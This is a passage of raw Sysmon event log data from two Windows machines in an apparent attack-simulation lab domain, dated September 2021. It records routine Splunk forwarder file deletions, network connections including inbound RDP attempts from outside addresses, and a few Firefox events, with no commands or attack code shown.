09:15:09.493{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=120191F94D08D80B35A8977D2868B79E,SHA256=9A089C35ACD3A9666D2DB74CEFAC64E434029392EFD28DA47DBFDBAACABCF31A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979488Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:06.094{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59055-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979487Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:09.347{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50D758A7E206CF8D405BDF399FC23E9B,SHA256=9650B3F492DF32A75474FDA70E7B21B0AC822C7B0E0BAEE2CA817469B00A9A97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050828Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:09.018{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=131585AB229861617D5680C0E3FF8031,SHA256=6012434895FD45D75084655882990860665719083890D80B1FB45C222440CC24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979486Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:09.340{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4312MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979490Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:10.386{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A3F62742C83851EEA6C17ECD959670F,SHA256=7F2D7DF8EF6AD733491CAB451EF08549742E8568EA418F91C67FE4857B472EA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050829Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:10.019{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D92B1665CBF307581E730BC378801990,SHA256=08AD559945C7F02ECD3D3679A2657DF3B27AA6FBEE68D535FD39533C45048523,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979492Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:11.558{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC0B967ED3ED3686676DCBDACDBDC31A,SHA256=C8DCE6989C1CDFE942C0E4288EA19A1BFCD5C4CA4154EDAB9DB66761999C12C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050831Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:08.775{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53412-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050830Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:11.065{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E465AC927D2E558AACDD10A02999B40F,SHA256=4038FF0F99A30EB833C2E8505223E049FAFC836D1BEACF25B25473862D487CEE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979491Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:07.855{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59423-false10.0.1.12-8000- 23542300x8000000000000000979493Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:12.558{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4AAD8BE1167503FC9F9EFD899202F5F,SHA256=F365DABABE04408E84E7868C95521142E834CE7E31649DC1DA4746638B4A6E84,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050833Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:09.436{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse119.167.194.165-51449-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050832Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:12.065{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD651E09153C762D8776B03F65B0C4C1,SHA256=3A2AB6A5A5FBBCB849552C5B9127CD8BEC7A239005984EAD06DE67186B8985FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979495Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:13.746{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979494Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:13.574{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A550C8AF14979F043BC154E620EF0478,SHA256=822B5FC9CA011DBD779861D666D29B6AE18D258F7C2E4D51EDDE9F3F936B2C3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050834Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:13.083{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C8AAC34A94DC11A19BB66AFDD4B04F8,SHA256=F23F1225BD285695C5525DFDBA42E897A47EFB41EA7439BDBF1389A6003DA8A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979496Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:14.652{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97C51DCA5E029101101A8A7A2466312B,SHA256=8D9A39D87E130B89C2D10EA185B43FADE798364C2E24249CB1E41A44FB594478,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050839Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:12.802{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60206-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001050838Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:12.381{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62369-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050837Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:14.164{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A7EAC39114109C5FA1EA75B66818DF6,SHA256=A433C05D208DBB1516698347DA35D874E21E784E9BB4254E578FB7281A2005FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050836Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:14.133{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2AAB8DDCCA74B045ED0E393709DB02D,SHA256=D3586CEEA7A5F12CEFFAC9DE64FA74DCA80BF6812469E32C488159418968B3BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050835Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:14.133{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=879B0BE00E00360BB5FB2696299CB513,SHA256=A7471714488BD9F280419AB46D70E80E8CB203D92675C962212D7BB51ECCA772,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979498Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:15.871{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B2333445573B7E3CFE4AB5B1C12C920,SHA256=F7986A731612754D73D68EE66D1ED76C7A323DAAEEAF10706F52AD4DEA98459C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050840Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:15.183{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B039399B68356EB18B3BF75388C172A,SHA256=BA9567244E1297FAE1F22C1FA09943A23F8570DB0D49A099B7D192414D5D5B50,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979497Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:12.371{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59424-false10.0.1.12-8089- 23542300x8000000000000000979500Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:16.886{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA8810A0640D3FC98BB1DD1959DB2743,SHA256=6C15647B50532E4A3668A1C9EB7609706E62558AA62E8AE368775D8DC79695E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050842Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:14.755{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53413-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050841Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:16.202{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E640504C8FBFC0B6860ACAEFB4869A84,SHA256=852E68942E067C931EF2D7783A3738B5015C326BDA3E7E10BD116E1F0DC2D1E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979499Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:13.761{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59425-false10.0.1.12-8000- 23542300x8000000000000000979501Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:17.917{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62ADB6D1CA8CBF2B9AA34E3B11BD23AE,SHA256=E6732DDFC52B42AE6A6F25D5E3DABA3F2076A195994B3FDF7FE1D010671004BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050846Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:16.073{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53414-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001050845Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:16.072{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53414-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001050844Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:17.366{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2AAB8DDCCA74B045ED0E393709DB02D,SHA256=D3586CEEA7A5F12CEFFAC9DE64FA74DCA80BF6812469E32C488159418968B3BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050843Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:17.204{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCB59B51F37DCFB5B85BA3BFBADF45B6,SHA256=F94B960FC59D96EA6D60991C78CE341D0A1219EAF6A7DCB9AEFC17D714970163,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979502Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:18.964{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12461ED0D2325C485FD7A2AD88B5536E,SHA256=6A5EB86973D3FF290398FB41B96AC039B82A9006897BC28F53B6804E744EB315,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050848Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:17.163{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse8.46.162.250-49459-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050847Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:18.204{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=978D5087C6DD9895322A105C85BDAA2D,SHA256=0338E8F758DCC66A434B1EF97B812A8A61E7B92E0595FC8E56D483E656F88665,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050852Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:19.567{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A08600FEBFC3EFC74B57DABEDCA616EC,SHA256=FA031AE40EE7815A808B2F97BB6612F588F49F1F8CF28B9680B3066FAD2FA0DC,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001050851Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:19.404{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\SiteSecurityServiceState.txt2021-09-27 08:10:19.295 23542300x80000000000000001050850Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:19.404{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\SiteSecurityServiceState.txtMD5=E771342A94859B6EAFE985E19FF25E02,SHA256=F13940E82442BB531E2878D6D543A5F0A25D3E66BCC0FA936E2EBA79043EF754,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050849Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:19.205{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF950B5A858DF9786DB834F7292D4596,SHA256=5BC5361D6AC00C0C93E77A208C35E3FEFA614063E7E14AB97592845D76F68AD7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050854Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:17.569{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49181-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050853Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:20.219{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D0CE611F9651AE3722475CE75F79DFA,SHA256=22F1BC66F7A9EF7A64EDCF4A44918DFECAEED792282E4B8167DFCC050D15BFFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979503Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:20.011{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5977157AE25D9271FEDDD7D2AB79303C,SHA256=5EF36E8E82799C8577D6A1B94EFEDCBBE953E9679E660DA5E5DD43B14D797784,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050855Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:21.266{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D9B482AEC466EADFBDC4B6826679B9A,SHA256=630269C9DCFF06C7E1B3A084239E9E8697118354F536E8FBB10F1CF835FB6BDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979506Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:21.949{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22CAA48825CB88A224A58EA27D9E5871,SHA256=31C9D8AF97F8E771F9E3761EA3E1884EC491CFDF178C8FC8C5455B9758B17BDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979505Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:21.949{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA660083D6858C2A61D35A33668C0ED3,SHA256=1C6873EF7D23F1CB30D98A98D2D1B8E910B2D47F0787A6ACD8B0C0D91E36D10C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979504Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:21.105{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BF54E82A574AF747C92A776493F73F1,SHA256=B19BC8EDA05E335B0D71127CBEA9E23F80C9B5F11CCFABD58D3837F430BB2D1A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050858Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:20.648{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.15-59811- 10341000x80000000000000001050857Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:22.750{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050856Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:22.284{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48C54907061D2ABA64233950779AD003,SHA256=D774CECC5B194BB2D7111D88EB12A3E5DE7CB7559E9CE91CCAB6FB3DEDAEC8FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979507Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:22.152{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A0BBC87C3AD3CE44ECCB4CC03B3C548,SHA256=B34E2EAF219C2436B39B6F5CFCFEE81AE57A1F4314385C51AA81C51E7C73197A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050861Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:20.726{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53415-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001050860Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:20.650{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15-59426-false10.0.1.14win-dc-429.attackrange.local49672- 23542300x80000000000000001050859Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:23.304{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 